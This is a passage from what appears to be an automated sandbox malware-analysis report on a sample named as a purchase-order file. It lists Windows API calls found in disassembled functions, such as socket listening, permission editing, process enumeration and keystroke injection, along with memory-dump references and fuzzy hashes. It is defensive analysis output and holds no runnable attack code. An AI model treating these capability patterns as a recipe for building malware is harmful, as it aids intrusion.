                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 1255039815-0
                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 00433073
                                                    • __swprintf.LIBCMT ref: 00433085
                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                    • String ID:
                                                    • API String ID: 1158019794-0
                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_strncmp
                                                    • String ID: @oH$\$^$h
                                                    • API String ID: 2175499884-3701065813
                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                    • String ID:
                                                    • API String ID: 540024437-0
                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                    • API String ID: 0-2872873767
                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcscat.LIBCMT ref: 00475657
                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID:
                                                    • API String ID: 2547909840-0
                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                    • String ID: *.*$\VH
                                                    • API String ID: 2786137511-2657498754
                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                    • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                    • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                    • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID: pqI
                                                    • API String ID: 2579439406-2459173057
                                                    • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                    • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                    • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                    • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                    APIs
                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsicollmouse_event
                                                    • String ID: DOWN
                                                    • API String ID: 1033544147-711622031
                                                    • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                    • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                    • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                    • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: KeyboardMessagePostState$InputSend
                                                    • String ID:
                                                    • API String ID: 3031425849-0
                                                    • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                    • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                    • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                    • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                    APIs
                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 4170576061-0
                                                    • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                    • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                    • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                    • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                    APIs
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                    • IsIconic.USER32 ref: 0047A393
                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                    • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                    • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                    • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                    APIs
                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                    • CoInitialize.OLE32(00000000), ref: 00478442
                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                    • CoUninitialize.OLE32 ref: 0047863C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
